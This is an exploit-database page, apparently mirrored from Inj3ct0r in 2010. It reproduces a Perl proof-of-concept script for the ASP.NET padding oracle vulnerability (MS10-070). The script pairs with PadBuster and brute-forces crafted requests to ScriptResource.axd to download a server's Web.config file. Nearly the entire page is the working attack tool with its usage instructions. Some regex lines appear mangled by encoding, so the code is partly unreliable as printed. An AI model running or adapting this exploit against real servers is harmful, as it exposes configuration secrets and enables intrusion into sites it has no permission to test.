Home / exploitsPDF  

[remote exploits] - ASP.NET Padding Oracle Vulnerability (MS

Posted on 06 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>ASP.NET Padding Oracle Vulnerability (MS10-070) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='ASP.NET Padding Oracle Vulnerability (MS10-070) by Giorgio Fedon in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===============================================
ASP.NET Padding Oracle Vulnerability (MS10-070)
===============================================

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
 
#!/usr/bin/perl
#
#
#  Webconfig Bruter - exploit tool for downloading Web.config
#
#  FOr use this script you need Pudbuster.
#  Padbuster is a great tool and Brian Holyfield deserve all the credits.
#  Download Padbuster:
#  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
#
#
#  Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#   
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0].&quot;?d=&quot;;
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV &lt; 2) {
 die &quot;   
  Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to use.
         This need to come from Padbuster.
         BlockSize = The block size being used by the algorithm (8 or 16)
         Poc code by giorgio.fedon@mindedsecurity.com
  Original Padbuster code from Brian Holyfield - Gotham Digital Science
 
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd  d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
          
&quot;;}
 
my $method = &quot;GET&quot;;
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = &quot;x00&quot; x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
  while ($status)
  {
   # Fuzz the test bytes
   for (my $byteNum = $blockSize - 1; $byteNum &gt;= 0; $byteNum--)
   {
   substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
                  }     
       
                   # Combine the test bytes and the sample
   my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
   chomp($combinedTestBytes);
   $combinedTestBytes =~ s/\%0A//g;
   # Ok, now make the request
   my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
   if ($status == &quot;200&quot;)
   {
   # Remove this for &quot;T&quot; exploit
   if (index($content,&quot;parent.Sys.Application&quot;) == -1)
   {
   print $content.&quot;

&quot;;
   print &quot;Total Requests:&quot;.$counter.&quot;

&quot;;
   print &quot;Resulting Exploit Block:&quot;.$combinedTestBytes.&quot;

&quot;;
   last;
   }
   }
   $counter++;
   }
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
 # UrlDecoder Encoder
 if ($oper == 1)
   {
$toEncodeDecode =~ s/-/+/g;
$toEncodeDecode =~ s/\_///g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.(&quot;=&quot; x int($count));
$returnVal = decode_base64($toEncodeDecode);
   }
   else
   {
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(
|
)//g;
$b64Encoded =~ s/+/-/g;
$b64Encoded =~ s///\_/g;
my $count = $b64Encoded =~ s/=//g;
($count eq &quot;&quot;) ? ($count = 0) : &quot;&quot;;
$returnVal = $b64Encoded.$count;
   }
  
 return $returnVal;
}
sub makeRequest {
 my ($method, $url) = @_;
 my ($lwp, $status, $content, $req, $location, $contentLength);  
  
 # Setup LWP UserAgent
 $lwp = LWP::UserAgent-&gt;new(env_proxy =&gt; 1,
                            keep_alive =&gt; 1,
                            timeout =&gt; 30,
       requests_redirectable =&gt; [],
                            );
  
 $req = new HTTP::Request $method =&gt; $url;
 
 my $response = $lwp-&gt;request($req);
  
 # Extract the required attributes from the response
 $status = substr($response-&gt;status_line, 0, 3);
 $content = $response-&gt;content;
 #print $content;
 $location = $response-&gt;header(&quot;Location&quot;);
 if ($location eq &quot;&quot;)
 {
  $location = &quot;N/A&quot;;
 }
 $contentLength = $response-&gt;header(&quot;Content-Length&quot;);
 return ($status, $content, $location, $contentLength);
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-06]</pre></body></html>

 

TOP

Malware :

Exploits :